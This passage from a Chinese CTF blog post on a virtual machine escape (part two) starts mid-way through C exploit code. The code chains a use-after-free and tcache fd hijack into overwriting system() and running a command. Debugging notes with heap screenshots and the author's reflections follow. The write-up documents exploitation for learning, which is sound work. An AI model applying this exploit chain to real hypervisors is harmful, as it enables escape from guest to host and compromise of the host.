class="hljs-number">0</span>;i&lt;len+<span class="hljs-number">0x10</span>;i+=<span class="hljs-number">4</span>)&#123;<br>        channel_recv_data(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,i,data,&amp;res);<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;recv data:%s\n&quot;</span>,data);<br><br>    channel_open(&amp;chan[<span class="hljs-number">1</span>].cookie1,&amp;chan[<span class="hljs-number">1</span>].cookie2,&amp;chan[<span class="hljs-number">1</span>].num,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to open channel!\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    channel_open(&amp;chan[<span class="hljs-number">2</span>].cookie1,&amp;chan[<span class="hljs-number">2</span>].cookie2,&amp;chan[<span class="hljs-number">2</span>].num,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to open channel!\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    channel_open(&amp;chan[<span class="hljs-number">3</span>].cookie1,&amp;chan[<span class="hljs-number">3</span>].cookie2,&amp;chan[<span class="hljs-number">3</span>].num,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to open channel!\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;this time free firstly\n&quot;</span>);<br>    getchar();<br>    channel_set_len(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,<span class="hljs-number">0xffff</span>,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to recv finish2\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;already free check the heap\n&quot;</span>);<br>    getchar();<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;alloc for channel 1\n&quot;</span>);<br>    getchar();<br><br>    channel_set_len(chan[<span class="hljs-number">1</span>].cookie1,chan[<span class="hljs-number">1</span>].cookie2,chan[<span class="hljs-number">1</span>].num,<span class="hljs-built_in">strlen</span>(s3),&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to set len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;leak2 success\n&quot;</span>);<br>    getchar();<br><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;free agin for UAF\n&quot;</span>);<br>    getchar();<br>    channel_set_len(chan[<span class="hljs-number">0</span>].cookie1,chan[<span class="hljs-number">0</span>].cookie2,chan[<span class="hljs-number">0</span>].num,<span class="hljs-number">0xffff</span>,&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to recv finish2\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;UAF done!\n&quot;</span>);<br>    getchar();<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;ready to change fd\n&quot;</span>);<br>    getchar();<br>    channel_send_data(chan[<span class="hljs-number">1</span>].cookie1,chan[<span class="hljs-number">1</span>].cookie2,chan[<span class="hljs-number">1</span>].num,<span class="hljs-number">8</span>,&amp;pay1,&amp;res);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;hjacking!!\n&quot;</span>);<br>    getchar();<br>    channel_set_len(chan[<span class="hljs-number">2</span>].cookie1,chan[<span class="hljs-number">2</span>].cookie2,chan[<span class="hljs-number">2</span>].num,<span class="hljs-built_in">strlen</span>(s3),&amp;res);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to set len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br><br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;target address in fd\n&quot;</span>);<br>    getchar();<br>    channel_set_len(chan[<span class="hljs-number">3</span>].cookie1,chan[<span class="hljs-number">3</span>].cookie2,chan[<span class="hljs-number">3</span>].num,<span class="hljs-built_in">strlen</span>(s3),&amp;res);<br><br>    channel_send_data(chan[<span class="hljs-number">3</span>].cookie1,chan[<span class="hljs-number">3</span>].cookie2,chan[<span class="hljs-number">3</span>].num,<span class="hljs-number">8</span>,&amp;pay2,&amp;res);<br>    channel_send_data(chan[<span class="hljs-number">3</span>].cookie1,chan[<span class="hljs-number">3</span>].cookie2,chan[<span class="hljs-number">3</span>].num,<span class="hljs-number">8</span>,&amp;pay3,&amp;res);<br>    channel_send_data(chan[<span class="hljs-number">3</span>].cookie1,chan[<span class="hljs-number">3</span>].cookie2,chan[<span class="hljs-number">3</span>].num,<span class="hljs-built_in">strlen</span>(pay4)+<span class="hljs-number">1</span>,pay4,&amp;res);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;success!\n&quot;</span>);<br>    getchar();<br>    run_cmd(s4);<br>    <span class="hljs-keyword">if</span>(!res)&#123;<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;fail to set len\n&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>&#125;<br><span class="hljs-type">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span>&#123;<br>    setvbuf(<span class="hljs-built_in">stdout</span>,<span class="hljs-number">0</span>,<span class="hljs-number">2</span>,<span class="hljs-number">0</span>);<br>    setvbuf(<span class="hljs-built_in">stderr</span>,<span class="hljs-number">0</span>,<span class="hljs-number">2</span>,<span class="hljs-number">0</span>);<br>    setvbuf(<span class="hljs-built_in">stdin</span>,<span class="hljs-number">0</span>,<span class="hljs-number">2</span>,<span class="hljs-number">0</span>);<br>    leak();<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;text base :%p&quot;</span>,text);<br>    getchar();<br>    getchar();<br>    exploit();<br>&#125;   <br></code></pre></td></tr></table></figure>

<h2 id="0x03-调试"><a href="#0x03-调试" class="headerlink" title="0x03 调试"></a>0x03 调试</h2><p>把断点放在realloc的位置，方便查看realloc后的堆布局。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-c15bb21f3a9a8d61cee8d1679228e3378e2a5c53.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>在第一次free的位置看到了目标chunk，<code>0x7f797803a890</code>，这个chunk就是我们要复用的chunk。此次realloc结束，应该被挂进tcache。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-5f6609f03fbf2c05e9a32233dda512666ac8401a.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>整个chunk的内容，可以看到大小是0x115，这里不知道为啥，连地址都没对齐。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-558cbd15fff8d78e9d81193abbc1855318dc2976.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>单步执行之后，看到被挂进tcache的chunk。当channel 1，alloc取出这块chunk的时候，没有触发到realloc，直接走过去了。所以没断下来。因该在if的判断位置加一个断点，查看堆布局的。</p>
<p>不过此时可以看一下目标chunk的内容，有没有被改变。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-af593aa4f5b88482d210904f17b6bbbdca1fff56.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>可以看到被挂上了熟悉的fd，但是却没有在相应的tcache里面，则可以推断，该chunk已经是alloc状态了。</p>
<p>继续执行，第二次free。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-cf83f7ba2ba709b640e4e31c373f2f4ce8374f6e.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>此次realloc依然触发free。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-90ca8fba0d3563f28628ce7e637ba491a0af2167.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>chunk被挂进了tcache，然后下一步执行dnd_version应该会把chunk取出，然后把虚表指针写入。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-3af68edeb6ac636b641ed4f28699a57cf02635d0.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>成功写入，接下来就是改写system的过程。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-fbcde0816cf86bb685d83ddcd650d26b20807683.png" srcset="/img/loading.gif" lazyload alt="图片.png"><br> channel 0的第一次free，记住chunk地址，0x7fa59c028e20，然后和leak一眼，对channel 1的UAF。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-b5c0c0dd42f4ab7ab018faf0a5ff2962d73667f5.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>劫持成功，但是此时tcache中却看不到，可能heapinfo有点问题。</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-08e8e166fe38c1669ae4f225b82c46399d34c220.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>计算偏移后，目标位置被打入tcache的fd中，然后就是常规利用。把该内存malloc出来。然后写入system</p>
<p><img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-babc2811b8fd15b84ebcde28aab4e8a3ad4d017e.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<p>成功写入system，继续执行，然后弹出计算器。<br> <img src="https://shs3.b.qianxin.com/attack_forum/2022/06/attach-b49b8f237dd3d59e57968a503942f5b52a884c87.png" srcset="/img/loading.gif" lazyload alt="图片.png"></p>
<h2 id="0x05-思考"><a href="#0x05-思考" class="headerlink" title="0x05 思考"></a>0x05 思考</h2><p>emm，调试总是遇到一些问题，有时候挂上gdb，leak出来的基址就不对了。。。离谱，不知道为什么。想到的办法是，先发送完payload，然后再attach上去，exp和leak部分分开调试。</p>
<p>还有虚拟机的vmx，移动的时候，权限关系，可能导致打不开虚拟机，只有使用sudo  vmware才可以打开，不过这样打开的虚拟机，最后可以成功leak和执行，但是弹不出计算器，也就是命令执行失败，报错报了虚拟化错误，搞了好久没解决，最后也是莫名其妙的突然解决了。</p>
<p>两个vm类型的虚拟机逃逸收获很大，逆向的基础牢固了许多，realworld类的题目和CTF还是有很多差别，前者需要很好的逆向功底和对目标的熟悉，后者更多是技巧上的利用。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/realworld/">#realworld</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>虚拟机逃逸（二）</div>
      <div>http://example.com/2022/06/22/虚拟机逃逸（二）/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Epiphany</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年6月22日</div>
        </div>
      
      
      <div class="license-meta-item">
        <div>许可协议</div>
        <div>
          
            
            
              <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
              <span class="hint--top hint--rounded" aria-label="BY - 署名">
                <i class="iconfont icon-by"></i>
              </span>
              </a>
            
          
        </div>
      </div>
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/06/22/%E8%99%9A%E6%8B%9F%E6%9C%BA%E9%80%83%E9%80%B8%EF%BC%88%E4%B8%80%EF%BC%89/" title="虚拟机逃逸（一）">
                        <span class="hidden-mobile">虚拟机逃逸（一）</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    

  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="/js/leancloud.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
